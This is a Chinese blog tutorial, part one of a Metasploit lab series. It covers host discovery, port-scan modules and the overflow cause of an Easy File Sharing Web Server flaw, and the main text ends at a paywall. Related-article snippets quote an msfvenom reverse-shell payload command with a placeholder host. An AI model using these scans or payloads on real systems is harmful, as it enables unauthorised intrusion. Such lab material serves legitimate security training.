msf渗透实验基本操作(上)

最新推荐文章于 2024-05-08 17:20:32 发布
最新推荐文章于 2024-05-08 17:20:32 发布
阅读量4.2k 收藏 4
点赞数 1
文章标签: metasploit 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kiwifruit__/article/details/121499544
版权
本文详细介绍了使用Metasploit进行渗透测试的基本操作,包括主机扫描、漏洞利用、后渗透攻击和内网攻防。通过实例展示了如何利用Metasploit进行ARP扫描、端口扫描、利用Easy File Sharing Web Server的漏洞,并在Win10和Win Server 2012环境下进行内网环境的搭建和域控制器升级。同时,文章还涉及了进程迁移、系统信息获取、权限提升等后渗透攻击技术。
摘要由CSDN通过智能技术生成

1.实验内容

(1)Metasploit 主机扫描

(2)Metasploit 漏洞利用

(3)Metasploit 后渗透攻击

(4)Metasploit 内网攻击

2.基本要求

(1)掌握Metasploit 架构及使用流程;

(2)掌握Metasploit 主机扫描、漏洞利用;

(3)掌握Metasploit 后渗透攻击技术;

(4)掌握Metasploit 内网攻击及域渗透技术。

3.实验环境

 vm虚拟机;

kali2012,ip地址是192.168.70.128

win10 x64,ip地址是192.168.70.129(桥接模式)

                    ip地址是192.168.70.135(nat模式)

(两个模式都可以,我是因为分开做的模式不一样导致ip地址不一样)

Win sever 2012  ip地址是192.168.70.134

  1. 实验过程
  1. Metasploit 主机扫描

使用metasploit中的modules/auxiliary/scanner/discovery中的arp_sweep或者udp_sweep

arp_sweep使用ARP请求本地局域网中的所有活跃主机

 

探测到目标机活跃

 

metasploit中的auxiliary/scanner/portscan中的扫描器进行端口扫描

 

ftpbounce:通过FTP BOUNCE攻击的原理对TCP服务进行枚举

xmas:一种更为隐蔽的扫描方式,通过发送FIN,PSH,URG标志能够躲避一些TCP标记检测器的过滤

ack:通过ACK扫描的方式对防火墙上未被屏蔽的端口进行探测;

tcp:通过一次完整的TCP链接来判断端口是否开放

syn:使用发送TCP SYN标志的方式探测开放的端口

端口扫描,使用auxiliary/scanner/portscan/tcp 进行端口扫描

指定端口范围为1-500

 

 

 (2)漏洞利用

   nmap扫描一下靶机开了哪些服务  

没有漏洞(新搭建的没有什么漏洞)

搭建漏洞

Easy File Sharing Web Server 是一种允许访客容易地经由浏览器上传/下载文件的文件分享系统.

漏洞成因

在对password进行字符串拷贝的时候,没有控制长度,导致缓冲区溢出.

win7靶机安装easy file sharing server 选择80端口

再次扫描

出现80端口easy file sharing server 可利用该端口

查看可用的攻击参数

最低0.47元/天 解锁文章
ccz128
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MSF连环攻击实验
weixin_30245867的博客
08-03 269
MSF连续攻击实验 一、实验拓扑 二、实验环境 Windows XP BT 5 32位 三、实验原理 通过扫描 XP主机,利用扫描出的漏洞建立 TCP会话,通过进程的提权,进一步获取目标机的控制权限 四、实验目的 掌握MSF连续攻击的原理和利用MSF攻击检测技术进行服务器漏洞的查找 五、实验步骤 1、 扫描目标主机的开放端口和操作指纹等信息 >db_nmap -...
一个简单的msf远程渗透实验
JYLCG的博客
05-08 1117
原文链接 网络攻防如同打仗 知己知彼百战不殆 要想学会防守必先知道敌人如何进攻 此教程的远端测试全是我的好友帮助测试 并非实际攻击!!! 写一篇远程的渗透教程给大家 当然不是为了教大家去黑别人电脑 而是让大家明白原理,懂得如何防范,再三强调!!! 使用此教程用在不正当地方造成的后果与本人无关!...
渗透测试-MSF工具使用简介及命令使用漏洞利用过程
最新发布
XLbb的博客
05-08 1694
1.MSF工具使用简介及命令使用(kali系统) 1.1什么是MSFMetasploit就是一个漏洞框架,是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。 步骤一:在kali系统中运行msf软件 :msfconsole; 如:测试编号为cve-2019-0708 的漏洞(windows7漏洞); 根据漏洞编号,用search查找相应的漏洞攻击工具。
网络攻防msf实验
qq_52506562的博客
10-20 952
使用永恒之蓝模块(永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。开始使用入侵模块进行入侵。
MSF利用ms17_010实验
谭宇
03-24 1788
ubuntu尝试ms17010漏洞的实验 该漏洞具有非常大的危害性,这个漏洞导致攻击者在目标系统上可以执行任意代,包括格式化电脑删除重要的内容。 当然漏洞非常的古老了,防范只需要打个补丁,再不济关闭445端口。 安装 首先打开终端输入 curl https://raw.githubusercontent.com/rapid7/metasploit-omni...
msf完整渗透测试
clayzx的博客
11-15 6526
从生成shell到远程连接 前言: 本来是最近打算把时间都花在学c上,渗透目前跟着老师学以后研究,但为了后续上课需求,就必须把这个给拿下了,于是花了今天一天的时间都在研究这个,写一篇详细的实验结果,为了给自己做笔记,也为了刚学msfconsole提供一个资料参考。不说废话了,以下是我们这篇的目标: 1.生成shell 2.上shell 3.监听 4.拿到会话 5.提权 6.拿到密码 7.远程连接 首先此次实验需要准备一台kali的虚拟机和一台windows 7的
浅谈MSF渗透测试
02-24
前不久MSF从4.7升级到MSF5.0,其中改进了数据库的处理逻辑,优化了msfconsole终端操作,并将PostgreSQL作为一个RESTful服务单独运行。此外还加入一个Web服务框架,新的免杀模块,优化了控制功能等。下面小白总结了...
msf 渗透测试
06-05
msf渗透
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
- **msf渗透神器windows版**:指Metasploit Framework的Windows版本,适合在Windows操作系统上进行渗透测试。 - **MSFconsole**:Metasploit Framework的控制台界面,用户可以通过命令行进行各种操作,如创建、编辑...
kali 渗透msf
11-14
kali渗透测试利器
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
Windows新建域时本地administrator账户密码不符合具体解决方案
10-01
在Window Server 2012中新建域时,碰到“无法新建域,因为本地administrator账户密码不符合要求” 的问题,具体解决方法如下,有类似问题的朋友可以参考下哈
msf渗透实验,抓取密钥及密钥生成原理所引发的问题
qq_64951792的博客
04-26 921
msf渗透实验
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)_msf漏洞扫描
2201_75735270的博客
03-29 2443
背景:永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
MSF模拟渗透测试攻击linux实例
lza20001103的博客
04-09 9187
MSF模拟渗透测试攻击linux实例
MSF内网渗透实战
hackzkaq的博客
05-17 3799
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全-小熊保安 本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀. 一、MSF生成木马上线目标 1. 生成木马 使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f ex
(环境搭建+复现)CVE-2021-26855 2021年3月 Exchange Server RCE 复现
daxi0ng的博客
03-16 6638
0x00 简介 Exchange Server是微软公司的是一套电子邮件服务组件,是个消息与协作系统,主要提供包括从电子邮件、会议安排、团体日程管理、任务管理、文档管理、实时会议和工作流等协作应用。 0x01 漏洞概述 CVE-2021-26855 该漏洞是Exchange中的服务端请求伪造漏洞(SSRF),利用此漏洞的攻击者能够发送任意HTTP请求并绕过Exchange Server身份验证,远程未授权的攻击者可以利用该漏洞以进行内网探测,并可以用于窃取用户邮箱的全部内容。 危害:该漏洞是Exch
MSF手机渗透实验
weixin_63204687的博客
10-22 4234
可真刑,太可拷了
MSF渗透攻击
weixin_43749601的博客
03-06 1699
进程迁移 刚获得shell时,该shell是极其脆弱和容易受到攻击的。所以第一步就是要移动这个shell,把它和目标机中的一个稳定的进程绑定在一块。 1.ps命令获取目标机正在运行的进程。 2.getpid获得shell的进程号(PID) 3.通过进程号得知该shell的进程名。 4.输入migrate + 被绑定进程的PID 5.再次输出getpid,发现进程号已经变成需要迁移的进程号,进程迁移成功 系统命令 shell连接稳定之后,开始收集系统信息 1.sysinfo命令查看目标机的系统信息 2.rou
msf渗透windows
10-10
了解,MSFMetasploit Framework)可以用于渗透测试和漏洞利用,也可以用于攻击。在Windows系统中,可以使用MSF来获取对系统的访问权限和控制权。以下是一些基本步骤: 1. 确认目标IP地址 2. 选择合适的漏洞利用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值